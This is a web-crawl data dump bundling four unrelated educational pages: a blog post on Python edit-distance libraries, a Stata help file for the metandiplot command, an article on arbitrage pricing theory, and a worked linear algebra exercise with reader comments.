{"ft_lang_label":"__label__en","ft_lang_prob":0.8405454,"math_prob":0.9998832,"size":7114,"snap":"2019-43-2019-47","text_gpt3_token_len":1916,"char_repetition_ratio":0.17974684,"word_repetition_ratio":0.12430721,"special_character_ratio":0.29195952,"punctuation_ratio":0.1336599,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999943,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34],"im_url_duplicate_count":[null,6,null,3,null,3,null,3,null,null,null,4,null,null,null,null,null,3,null,3,null,null,null,3,null,3,null,3,null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-19T15:52:34Z\",\"WARC-Record-ID\":\"<urn:uuid:a05495a9-57a6-44c9-bba5-7d2f1c174e6b>\",\"Content-Length\":\"257263\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bebb32e0-7e4c-4e8a-87e8-a8a6331739fd>\",\"WARC-Concurrent-To\":\"<urn:uuid:86a23e4c-4c9a-41af-aef6-360f7f64b4ef>\",\"WARC-IP-Address\":\"208.80.154.224\",\"WARC-Target-URI\":\"https://en.wikibooks.org/wiki/Statistical_Thermodynamics_and_Rate_Theories/Sample_problems\",\"WARC-Payload-Digest\":\"sha1:DJYJQYU67J6HFLANMASP4A3JKFR34TOM\",\"WARC-Block-Digest\":\"sha1:NWOK7PHP65F4FFYWWOHB5E5O4AP5ZRJL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986696339.42_warc_CC-MAIN-20191019141654-20191019165154-00059.warc.gz\"}"}
https://www.aylakhan.tech/?p=736
[ "Recent Posts\n\nArchives\n\nCategories\n\n• Home>\n• data>\nIf this helped you, please share!\n\n# Python text analysis tools: Levenshtein Distance\n\nPublished January 31, 2020 in data\n\nFiguring out how similar two strings are and then making that similarity a quantitative measurement is a basic problem in text analysis, text mining and natural language processing. There are a number of efficient methods to solve this problem. This survey looks at Python implementations of a simple but widely used method: Levenshtein distance as a measure of edit distance.\n\nEdit distance between two strings is the minimum total number of operations that change one string into the other ,,. Edit distance is zero if two strings are identical. Edit distance is positive if two strings are not identical. Edit distance does not consider the length of the strings being compared: two strings that are close in length and are different by one character are treated the same as two strings where one is much longer than the other . All the implementations I tested are case-sensitive.\n\nGenerally, edit operations are inserting, deleting and substituting characters. Some methods support transposing characters. Fuzzy string matching libraries such as fuzzywuzzy are typically based on edit distance methods.\n\n## Levenshtein Distance\n\nLevenshtein distance computes edit distance with insert, delete and substitution operations. This is the most parsimonious set of operations to transform one string into another. Levenshtein distance can be computed recursively , but efficient implementations use dynamic programming solutions with a table for holding computed costs ,.\n\nHere are some illustrated simple edit distance operations. The first four examples demonstrate the operations on single character and empty strings:", null, "", null, "", null, "", null, "Next, we have a simple sequence of replace operations that transform “ab” to “ba”:", null, "Both of these examples have edit distance equal to 3 because it takes three operations to transform one word to another:", null, "", null, "## Damerau-Levenshtein Distance\n\nDamerau-Levenshtein extends the Levenshtein distance method with an additional operation: transpose, where two adjacent characters can be swapped. Damerau-Levenshtein may compute smaller edit distances if adjacent transpose operations can replace multiple replace operations. Efficient implementations are also based on dynamic programming .\n\nTaking another look at the similarity of “ab” and “ba”, where the Levenshtein edit distance is 2:", null, "Text similarity calculated using Damerau-Levenshtein returns edit distance equal to 1 because “ab” is changed into “ba” with one transpose operation instead of two replace operations:", null, "The edit distance between “irks” and “risk” is larger with Levenshtein distance than Damerau-Levenshtein distance. Another way to think about this is “irks” and “risk” are more similar if using Damerau-Levenshtein than if using Levenshtein.", null, "", null, "## Python Tools\n\nFuzzywuzzy‘s optimized similarity functions are implemented using the python-Levenshtein module. The actual Levenshtein edit distance code is written in C for faster performance. Fuzzywuzzy can fall back to a slower pure Python implementation if python-Levenshtein is not available.\n\nThe pyxDamerauLevenshtein module provides Damerau-Levenshtein as a dynamic programming algorithm written in C.\n\nThe StringDist module provides both Levenshtein and Damerau-Levenshtein. The algorithms are also implemented in C and falls back to Python if the C implementation can’t be used.\n\nThe jellyfish module includes an extensive list of string matching algorithms, including both Levenshtein and Damerau-Levenshtein, all implemented in both C and Python with the choice of using either.\n\n### Benchmarks\n\nI used longer strings than in the illustrated examples to benchmark the performance and memory usage of these Python tools. The first test computes the edit distances between “this was a test” and “this is a coast”. The second test is the Amelia Earhart quote “the most difficult thing is the decision to act, the rest is merely tenacity” compared with this version mutated with deliberately misspelled words: “teh most difficult thing is the decsion to act, the reast is merely teancty”. The Levenshtein and Damerau-Levenshtein edit distances are equal in the first test. The Damerau-Levenshtein edit distance is smaller than the Levenshtein edit distance in the second test.\n\nMemory usage is consistent for both examples and all tools (approximately 57-58 MiB). There is a lot more variation in performance between the tools: python-Levenshtein was very fast, StringDist and jellyfish also computed edit distances efficiently and were the fastest Damerau-Levenshtein implementations. StringDist performed slightly better in the first test and jellyfish performed better in the second test.\n\n1. Jurafsky, Daniel and James H. Martin. Speech and Language Processing: An Introduction to Natural Language Processing, Computational Linguistics, and Speech Recognition. 3rd Edition Draft. Accessed August 11, 2019. https://web.stanford.edu/~jurafsky/slp3.\n2. Koutroumbas, Konstantinos and Sergios Theodoridis. Pattern recognition. Cambridge: Academic Press, 2008.\n3. Sarkar, Dipanjan. Text Analytics with Python: A Practitioner’s Guide to Natural Language Processing. New York: Apress Media, 2019.\n4. “Edit Distance”, Wikipedia, last modified August 3, 2019, https://en.wikipedia.org/wiki/Edit_distance.\n5. “Levenshtein Distance”, Wikipedia, last modified August 20, 2019, https://en.wikipedia.org/wiki/Levenshtein_distance.\n6. “Damerau-Levenshtein Distance”, Wikipedia, last modified May 3, 2019, https://en.wikipedia.org/wiki/Damerau-Levenshtein_distance." ]
[ null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/insert1.png", null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/delete1.png", null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/replace1.png", null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/replace2.png", null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/replace3.png", null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/about_around.png", null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/teapot_tepid.png", null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/replace3.png", null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/transpose1.png", null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/irks_risk.png", null, "https://www.aylakhan.tech/wp-content/uploads/2019/09/irks_risk_transpose.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9069708,"math_prob":0.8047548,"size":4568,"snap":"2022-40-2023-06","text_gpt3_token_len":936,"char_repetition_ratio":0.18667835,"word_repetition_ratio":0.0029850747,"special_character_ratio":0.17797723,"punctuation_ratio":0.08068783,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96721673,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22],"im_url_duplicate_count":[null,4,null,4,null,4,null,4,null,8,null,4,null,4,null,8,null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-25T19:53:06Z\",\"WARC-Record-ID\":\"<urn:uuid:8e487d1f-6fe0-4c36-8aef-1c5a0dfca1a2>\",\"Content-Length\":\"56914\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:005fc18e-e7b4-4716-88f2-e0d4a2ba348f>\",\"WARC-Concurrent-To\":\"<urn:uuid:9bddf803-8bb1-4f9f-a84d-1878b55663f1>\",\"WARC-IP-Address\":\"35.209.188.49\",\"WARC-Target-URI\":\"https://www.aylakhan.tech/?p=736\",\"WARC-Payload-Digest\":\"sha1:BP2OECPSC5WHDKD2BMOA3HZ2PB7DQKPJ\",\"WARC-Block-Digest\":\"sha1:U7MUVYRVEQO3SLYMNJG7DBGTEMV7ZLMY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030334596.27_warc_CC-MAIN-20220925193816-20220925223816-00375.warc.gz\"}"}
http://fmwww.bc.edu/repec/bocode/m/metandiplot.html
[ "```help metandiplot (Roger Harbord)\nalso see: metandi\n-------------------------------------------------------------------------------\n\nTitle\n\nmetandiplot -- SROC plot of results from metandi\n\nSyntax\n\nmetandiplot [ tp fp fn tn] [if] [in] [weight] [, notruncate level(#)\ntwoway_options ]\n\naweights, fweights, and pweights are allowed; see weight.\n\nDescription\n\nmetandiplot graphs the results from metandi on a summary receiver\noperating characteristic (SROC) plot. By default the display includes:\n\n- a summary point showing the summary sensitivity and specificity\n- a confidence contour outlining the confidence region for the\nsummary point\n- one or more prediction contours outlining the prediction region for\nthe true sensitivity and specificity in a future study\n- the HSROC curve from the hierarchical Summary ROC (HSROC) model\n\nIf the optional variables tp fp fn tn are included on the command line,\nthe plot also includes study estimates indicating the sensitivity and\nspecificity estimated using the data from each study separately.\n\nAny of these features may be customised or turned off using the\nsubplot_options.\n\nOptions\n\nnotruncate specificies that the HSROC curve will not be truncated outside\nthe region of the data. By default, the HSROC curve is not shown\nwhen the sensitivity or specificity is less than its smallest study\nestimate.\n\nlevel(#) specifies the confidence level, in percent, for the confidence\ncontour; see help level.\n\npredlevel(numlist) specifies the levels, in percent, for the prediction\ncontour(s). The default is a single contour at the same probability\nlevel as the confidence region. Up to five prediction contours are\nallowed.\n\nnpoints(#) specifies the number of points to use in drawing the outlines\nof the confidence and prediction regions. The default is 500.\n\nsubplot_options: summopts(), confopts(), predopts(), curveopts() and\nstudyopts() specify options that control the display of the summary\npoint, confidence contour, prediction contour(s), HSROC curve and\nstudy symbols respectively. The options within each set of\nparantheses are simply passed through to the appropriate twoway plot.\nIn addition, any of the plots can be turned off by specifying, for\nexample, summopts(off).\n\nsee addplot_option. For example, empirical Bayes predictions could\nbe generated by using predict after metandi and added to the graph.\nSee metandipostestimation.\n\ntwoway_options are most of the options documented in twoway_options,\nincluding options for titles, axes, labels, schemes and saving the\ngraph to disk. The by() option is not allowed, however.\n\nRemarks\n\nThe default is to weight the study estimates by the total number in each\nstudy, giving symbols (open circles by default) scaled according to the\nsize of the weights; see weighted markers. To make the symbols all the\nsame size, specify constant weights, e.g. [aw=1].\n\nExamples\n\n. metandiplot\n\n. metandiplot tp fp fn tn\n\n. metandiplot tp fp fn tn [aw=1], conf(off) curve(off) predlevel(50 80 95\n99)\n\nAlso see\n\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.77473193,"math_prob":0.877238,"size":2968,"snap":"2020-45-2020-50","text_gpt3_token_len":636,"char_repetition_ratio":0.13495277,"word_repetition_ratio":0.008988764,"special_character_ratio":0.20249327,"punctuation_ratio":0.119140625,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96166074,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-03T04:15:51Z\",\"WARC-Record-ID\":\"<urn:uuid:32f3cd9a-9755-4010-bf43-f463f359a548>\",\"Content-Length\":\"4738\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c1895b9c-d9db-4293-ad48-23e59d3fb246>\",\"WARC-Concurrent-To\":\"<urn:uuid:3d793471-bc47-49dc-93ee-c62fc2f9b7c8>\",\"WARC-IP-Address\":\"136.167.18.142\",\"WARC-Target-URI\":\"http://fmwww.bc.edu/repec/bocode/m/metandiplot.html\",\"WARC-Payload-Digest\":\"sha1:W6HO5QE35ABA7643JSJC7QUMD4E7PULG\",\"WARC-Block-Digest\":\"sha1:S66PRATZRBELJ6VNNRI4KSSN6SFK7YNK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141718314.68_warc_CC-MAIN-20201203031111-20201203061111-00198.warc.gz\"}"}
https://db0nus869y26v.cloudfront.net/en/Arbitrage_pricing_theory
[ "In finance, arbitrage pricing theory (APT) is a multi-factor model for asset pricing which relates various macro-economic (systematic) risk variables to the pricing of financial assets. Proposed by economist Stephen Ross in 1976, it is widely believed to be an improved alternative to its predecessor, the Capital Asset Pricing Model (CAPM). APT is founded upon the law of one price, which suggests that within an equilibrium market, rational investors will implement arbitrage such that the equilibrium price is eventually realised. As such, APT argues that when opportunities for arbitrage are exhausted in a given period, then the expected return of an asset is a linear function of various factors or theoretical market indices, where sensitivities of each factor is represented by a factor-specific beta coefficient or factor loading. Consequently, it provides traders with an indication of ‘true’ asset value and enables exploitation of market discrepancies via arbitrage. The linear factor model structure of the APT is used as the basis for evaluating asset allocation, the performance of managed funds as well as the calculation of cost of capital. \n\n## Model\n\nAPT is a single-period static model, which helps investors understand the trade-off between risk and return. The average investor aims to optimise the returns for any given level or risk and as such, expects a positive return for bearing greater risk. As per the APT model, risky asset returns are said to follow a factor intensity structure if they can be expressed as:\n\n$r_{j}=a_{j}+\\beta _{j1}f_{1}+\\beta _{j2}f_{2}+\\cdots +\\beta _{jn}f_{n}+\\epsilon _{j)$", null, "where\n• $a_{j)$", null, "is a constant for asset $j$", null, "• $f_{n)$", null, "is a systematic factor\n• $\\beta _{jn)$", null, "is the sensitivity of the $j$", null, "th asset to factor $n$", null, ", also called factor loading,\n• and $\\epsilon _{j)$", null, "is the risky asset's idiosyncratic random shock with mean zero.\n\nIdiosyncratic shocks are assumed to be uncorrelated across assets and uncorrelated with the factors.\n\nThe APT model states that if asset returns follow a factor structure then the following relation exists between expected returns and the factor sensitivities:\n\n$\\mathbb {E} \\left(r_{j}\\right)=r_{f}+\\beta _{j1}RP_{1}+\\beta _{j2}RP_{2}+\\cdots +\\beta _{jn}RP_{n)$", null, "where\n• $RP_{n)$", null, "is the risk premium of the factor,\n• $r_{f)$", null, "is the risk-free rate,\n\nThat is, the expected return of an asset j is a linear function of the asset's sensitivities to the n factors.\n\nNote that there are some assumptions and requirements that have to be fulfilled for the latter to be correct: There must be perfect competition in the market, and the total number of factors may never surpass the total number of assets (in order to avoid the problem of matrix singularity).\n\n### General Model\n\nFor a set of assets with returns $r\\in \\mathbb {R} ^{m)$", null, ", factor loadings $\\Lambda \\in \\mathbb {R} ^{m\\times n)$", null, ", and factors $f\\in \\mathbb {R} ^{n)$", null, ", a general factor model that is used in APT is:\n\n$r=r_{f}+\\Lambda f+\\epsilon ,\\quad \\epsilon \\sim {\\mathcal {N))(0,\\Psi )$", null, "where $\\epsilon$", null, "follows a multivariate normal distribution. In general, it is useful to assume that the factors are distributed as:\n$f\\sim {\\mathcal {N))(\\mu ,\\Omega )$", null, "where $\\mu$", null, "is the expected risk premium vector and $\\Omega$", null, "is the factor covariance matrix. Assuming that the noise terms for the returns and factors are uncorrelated, the mean and covariance for the returns are respectively:\n$\\mathbb {E} (r)=r_{f}+\\Lambda \\mu ,\\quad {\\text{Cov))(r)=\\Lambda \\Omega \\Lambda ^{T}+\\Psi$", null, "It is generally assumed that we know the factors in a model, which allows least squares to be utilized. However, an alternative to this is to assume that the factors are latent variables and employ factor analysis - akin to the form used in psychometrics - to extract them.\n\n### Assumptions of APT Model\n\nThe APT model for asset valuation is founded on the following assumptions:\n\n1. Investors are risk-averse in nature and possess the same expectations\n2. Efficient markets with limited opportunity for arbitrage\n3. Perfect capital markets\n4. Infinite number of assets\n5. Risk factors are indicative of systematic risks that cannot be diversified away and thus impact all financial assets, to some degree. Thus, these factors must be:\n• Non-specific to any individual firm or industry\n• Compensated by the market via a risk premium\n• A random variable\n\n## Arbitrage\n\nArbitrage is the practice whereby investors take advantage of slight variations in asset valuation from its fair price, to generate a profit. It is the realisation of a positive expected return from overvalued or undervalued securities in the inefficient market without any incremental risk and zero additional investments.\n\n### Mechanics\n\nIn the APT context, arbitrage consists of trading in two assets – with at least one being mispriced. The arbitrageur sells the asset which is relatively too expensive and uses the proceeds to buy one which is relatively too cheap.\n\nUnder the APT, an asset is mispriced if its current price diverges from the price predicted by the model. The asset price today should equal the sum of all future cash flows discounted at the APT rate, where the expected return of the asset is a linear function of various factors, and sensitivity to changes in each factor is represented by a factor-specific beta coefficient.\n\nA correctly priced asset here may be in fact a synthetic asset - a portfolio consisting of other correctly priced assets. This portfolio has the same exposure to each of the macroeconomic factors as the mispriced asset. The arbitrageur creates the portfolio by identifying n correctly priced assets (one per risk-factor, plus one) and then weighting the assets such that portfolio beta per factor is the same as for the mispriced asset.\n\nWhen the investor is long the asset and short the portfolio (or vice versa) he has created a position which has a positive expected return (the difference between asset return and portfolio return) and which has a net zero exposure to any macroeconomic factor and is therefore risk free (other than for firm specific risk). The arbitrageur is thus in a position to make a risk-free profit:\n\n Where today's price is too low: The implication is that at the end of the period the portfolio would have appreciated at the rate implied by the APT, whereas the mispriced asset would have appreciated at more than this rate. The arbitrageur could therefore: Today: 1 short sell the portfolio 2 buy the mispriced asset with the proceeds. At the end of the period: 1 sell the mispriced asset 2 use the proceeds to buy back the portfolio 3 pocket the difference. Where today's price is too high: The implication is that at the end of the period the portfolio would have appreciated at the rate implied by the APT, whereas the mispriced asset would have appreciated at less than this rate. The arbitrageur could therefore: Today: 1 short sell the mispriced asset 2 buy the portfolio with the proceeds. At the end of the period: 1 sell the portfolio 2 use the proceeds to buy back the mispriced asset 3 pocket the difference.\n\n## Difference between the capital asset pricing model\n\nThe APT along with the capital asset pricing model (CAPM) is one of two influential theories on asset pricing. The APT differs from the CAPM in that it is less restrictive in its assumptions, making it more flexible for use in a wider range of application. Thus, it possesses greator explanatory power (as opposed to statistical) for expected asset returns. It assumes that each investor will hold a unique portfolio with its own particular array of betas, as opposed to the identical \"market portfolio\". In some ways, the CAPM can be considered a \"special case\" of the APT in that the securities market line represents a single-factor model of the asset price, where beta is exposed to changes in value of the market.\n\nFundamentally, the CAPM is derived on the premise that all factors in the economy can be reconciled into one factor represented by a market portfolio, thus implying they all have equivalent weight on the asset’s return. In contrast, the APT model suggests that each stock reacts uniquely to various macroeconomic factors and thus the impact of each must be accounted for separately.\n\nA disadvantage of APT is that the selection and the number of factors to use in the model is ambiguous. Most academics use three to five factors to model returns, but the factors selected have not been empirically robust. In many instances the CAPM, as a model to estimate expected returns, has empirically outperformed the more advanced APT.\n\nAdditionally, the APT can be seen as a \"supply-side\" model, since its beta coefficients reflect the sensitivity of the underlying asset to economic factors. Thus, factor shocks would cause structural changes in assets' expected returns, or in the case of stocks, in firms' profitabilities.\n\nOn the other side, the capital asset pricing model is considered a \"demand side\" model. Its results, although similar to those of the APT, arise from a maximization problem of each investor's utility function, and from the resulting market equilibrium (investors are considered to be the \"consumers\" of the assets).\n\n## Implementation\n\nAs with the CAPM, the factor-specific betas are found via a linear regression of historical security returns on the factor in question. Unlike the CAPM, the APT, however, does not itself reveal the identity of its priced factors - the number and nature of these factors is likely to change over time and between economies. As a result, this issue is essentially empirical in nature. Several a priori guidelines as to the characteristics required of potential factors are, however, suggested:\n\n1. their impact on asset prices manifests in their unexpected movements and they are completely unpredictable to the market at the beginning of each period \n2. they should represent undiversifiable influences (these are, clearly, more likely to be macroeconomic rather than firm-specific in nature) on expected returns and so must be quantifiable with non-zero prices \n3. timely and accurate information on these variables is required\n4. the relationship should be theoretically justifiable on economic grounds\n\nChen, Roll and Ross identified the following macro-economic factors as significant in explaining security returns:\n\n• surprises in inflation;\n• surprises in GNP as indicated by an industrial production index;\n• surprises in investor confidence due to changes in default premium in corporate bonds;\n• surprise shifts in the yield curve.\n\nAs a practical matter, indices or spot or futures market prices may be used in place of macro-economic factors, which are reported at low frequency (e.g. monthly) and often with significant estimation errors. Market indices are sometimes derived by means of factor analysis. More direct \"indices\" that might be used are:\n\n• short-term interest rates;\n• the difference in long-term and short-term interest rates;\n• a diversified stock index such as the S&P 500 or NYSE Composite;\n• oil prices\n• gold or other precious metal prices\n• Currency exchange rates\n\n3. ^ Huberman, G. & Wang, Z. (2005). \"Arbitrage Pricing Theory\" (PDF).((cite web)): CS1 maint: multiple names: authors list (link)" ]
[ null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/541e45cebee0ac09b61110f6dff99a951d3c4e2a", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/d0096fb78d6843c9fb67a840dc796b61ad93eec2", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/2f461e54f5c093e92a55547b9764291390f0b5d0", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/b2702450f0458a5e01a698e248af552a7fab2b50", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/c2bf0c740a5cee64571cee412b16c1d4250ba504", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/2f461e54f5c093e92a55547b9764291390f0b5d0", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/a601995d55609f2d9f5e233e36fbe9ea26011b3b", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/e1d007888875e2294ff7ef04b13349b27ec46e5a", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/c35adc8715c440af374761683692c18e2c22304c", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/8aa255b90c7763e72245ddbd5461c022b0aeac34", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/7c87b228b9a0db910ffa622d7f417de3fa64258a", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/aec8b4a90a361574bced206cb9f5dcbd11b94b28", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/087a34835d10d288ebfaa7b78b5c4bec1bad1fb7", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/b40ef47ea1778c614bd919ece60cbde503cb370a", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/b5fd7784c1f2486832ba1038c4351d882716be5d", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/c3837cad72483d97bcdde49c85d3b7b859fb3fd2", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/acf0552b7db0dd623a0ba876e0574bbe3351c4e2", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/9fd47b2a39f7a7856952afec1f1db72c67af6161", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/24b0d5ca6f381068d756f6337c08e0af9d1eeb6f", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/f8d589e8c3519ebd95d43ddd52a8ad9ba5fdd473", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.93549055,"math_prob":0.96041113,"size":7273,"snap":"2022-40-2023-06","text_gpt3_token_len":1455,"char_repetition_ratio":0.13880864,"word_repetition_ratio":0.021168502,"special_character_ratio":0.19139282,"punctuation_ratio":0.084033616,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9971996,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40],"im_url_duplicate_count":[null,4,null,null,null,null,null,null,null,4,null,null,null,null,null,null,null,4,null,null,null,null,null,8,null,8,null,8,null,9,null,null,null,9,null,null,null,null,null,9,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-03T02:11:19Z\",\"WARC-Record-ID\":\"<urn:uuid:1a0036a7-bd49-4520-b3ab-01a01d0b63d2>\",\"Content-Length\":\"129848\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c10ee4b5-1fe1-4e15-8b1d-c6e166b8d718>\",\"WARC-Concurrent-To\":\"<urn:uuid:e4e42279-95cd-4035-bf2c-b05eed5ce243>\",\"WARC-IP-Address\":\"99.84.109.143\",\"WARC-Target-URI\":\"https://db0nus869y26v.cloudfront.net/en/Arbitrage_pricing_theory\",\"WARC-Payload-Digest\":\"sha1:UXAFL4AOQ57Q425KNRJYHP3ZHXP2NZ2E\",\"WARC-Block-Digest\":\"sha1:JR3EAUKPNHOZ3JWWLNVPH7YVVCWTLWXU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337371.9_warc_CC-MAIN-20221003003804-20221003033804-00754.warc.gz\"}"}
https://math.hecker.org/2011/09/02/linear-algebra-and-its-applications-exercise-2-2-12/
[ "## Linear Algebra and Its Applications, Exercise 2.2.12\n\nExercise 2.2.12. What is a 2 by 3 system of equations", null, "$Ax = b$ that has the following general solution?", null, "$x = \\begin{bmatrix} 1 \\\\ 1 \\\\ 0 \\end{bmatrix} + w \\begin{bmatrix} 1 \\\\ 2 \\\\ 1 \\end{bmatrix}$\n\nAnswer: The general solution above is the sum of a particular solution and a homogeneous solution, where", null, "$x_{particular} = \\begin{bmatrix} 1 \\\\ 1 \\\\ 0 \\end{bmatrix}$\n\nand", null, "$x_{homogeneous} = w \\begin{bmatrix} 1 \\\\ 2 \\\\ 1 \\end{bmatrix}$\n\nSince", null, "$w$ is the only variable referenced in the homogeneous solution it must be the only free variable, with", null, "$u$ and", null, "$v$ being basic. Since", null, "$u$ is basic we must have a pivot in column 1, and since", null, "$v$ is basic we must have a second pivot in column 2. After performing elimination on", null, "$A$ the resulting echelon matrix", null, "$U$ must therefore have the form", null, "$U = \\begin{bmatrix} *&*&* \\\\ 0&*&* \\end{bmatrix}$\n\nTo simplify solving the problem we can assume that", null, "$A$ also has this form; in other words, we assume that", null, "$A$ is already in echelon form and thus we don’t need to carry out elimination. The matrix", null, "$A$ then has the form", null, "$A = \\begin{bmatrix} a_{11}&a_{12}&a_{13} \\\\ 0&a_{22}&a_{23} \\end{bmatrix}$\n\nwhere", null, "$a_{11}$ and", null, "$a_{22}$ are nonzero (because they are pivots).\n\nWe then have", null, "$Ax_{homogeneous} = \\begin{bmatrix} a_{11}&a_{12}&a_{13} \\\\ 0&a_{22}&a_{23} \\end{bmatrix} w \\begin{bmatrix} 1 \\\\ 2 \\\\ 1 \\end{bmatrix} = 0$\n\nIf we assume that", null, "$w$ is 1 and express the right-hand side in matrix form this then becomes", null, "$\\begin{bmatrix} a_{11}&a_{12}&a_{13} \\\\ 0&a_{22}&a_{23} \\end{bmatrix} \\begin{bmatrix} 1 \\\\ 2 \\\\ 1 \\end{bmatrix} = \\begin{bmatrix} 0 \\\\ 0 \\end{bmatrix}$\n\nor (expressed as a system of equations)", null, "$\\setlength\\arraycolsep{0.2em}\\begin{array}{rcrcrcl}a_{11}&+&2a_{12}&+&a_{13}&=&0 \\\\ &&2a_{22}&+&a_{23}&=&0 \\end{array}$\n\nThe pivot", null, "$a_{11}$ must be nonzero, and we arbitrarily assume that", null, "$a_{11} = 1$. We can then satisfy the first equation by assigning", null, "$a_{12} = 0$ and", null, "$a_{13} = -1$. The pivot", null, "$a_{22}$ must also be nonzero, and we arbitrarily assume that", null, "$a_{22} = 1$ as well. We can then satisfy the second equation by assigning", null, "$a_{23} = -2$. Our proposed value of", null, "$A$ is then", null, "$A = \\begin{bmatrix} 1&0&-1 \\\\ 0&1&-2 \\end{bmatrix}$\n\nso that we have", null, "$Ax_{homogeneous} = \\begin{bmatrix} 1&0&-1 \\\\ 0&1&-2 \\end{bmatrix} \\begin{bmatrix} 1 \\\\ 2 \\\\ 1 \\end{bmatrix} = \\begin{bmatrix} 0 \\\\ 0 \\end{bmatrix}$\n\nas required.\n\nWe next turn to the general system", null, "$Ax = b$. We now have a value for", null, "$A$, and we were given the value of the particular solution. We can multiply the two to calculate the value of", null, "$b$:", null, "$b = Ax_{particular} = \\begin{bmatrix} 1&0&-1 \\\\ 0&1&-2 \\end{bmatrix} \\begin{bmatrix} 1 \\\\ 1 \\\\ 0 \\end{bmatrix} = \\begin{bmatrix} 1 \\\\ 1 \\end{bmatrix}$\n\nThis gives us the following as an example 2 by 3 system that has the general solution specified above:", null, "$\\begin{bmatrix} 1&0&-1 \\\\ 0&1&-2 \\end{bmatrix} \\begin{bmatrix} u \\\\ v \\\\ w \\end{bmatrix} = \\begin{bmatrix} 1 \\\\ 1 \\end{bmatrix}$\n\nor", null, "$\\setlength\\arraycolsep{0.2em}\\begin{array}{rcrcrcl}u&&&-&w&=&1 \\\\ &&v&-&2w&=&1 \\end{array}$\n\nFinally, note that the solution provided for exercise 2.2.12 at the end of the book is incorrect. The right-hand side must be a 2 by 1 matrix and not a 3 by 1 matrix, so the final value of 0 in the right-hand side should not be present.\n\nNOTE: This continues a series of posts containing worked out exercises from the (out of print) book Linear Algebra and Its Applications, Third Edition", null, "by Gilbert Strang.\n\nIf you find these posts useful I encourage you to also check out the more current Linear Algebra and Its Applications, Fourth Edition", null, ", Dr Strang’s introductory textbook Introduction to Linear Algebra, Fourth Edition", null, "and the accompanying free online course, and Dr Strang’s other books", null, ".\n\nThis entry was posted in linear algebra. Bookmark the permalink.\n\n### 2 Responses to Linear Algebra and Its Applications, Exercise 2.2.12\n\n1.", null, "Daniel says:\n\nI think that your final note is incorrect, due to the fact that if you find the general solution for the system Ax=b that you found, you’ll have to write the solution like Strang does it in (3) page (76). There are three entries on the solution because “x” vector lenght. The general solution (in Matlab notation) is x = [u; v; w] = [1+w; 1+2w; w]= [1; 1; 0] + w*[1; 2; 1]. The general solution he proposed at the begining of the exercise\n\n•", null, "hecker says:\n\nMy apologies for the delay in responding. Are you referring to my final sentence about the solution to exercise 2.2.12 given on page 476 in the back of the book? If so, I think I may have confused you. I am *not* saying that Strang wrote the general solution incorrectly in the statement of the exercise on page 79, or that Strang found an incorrect 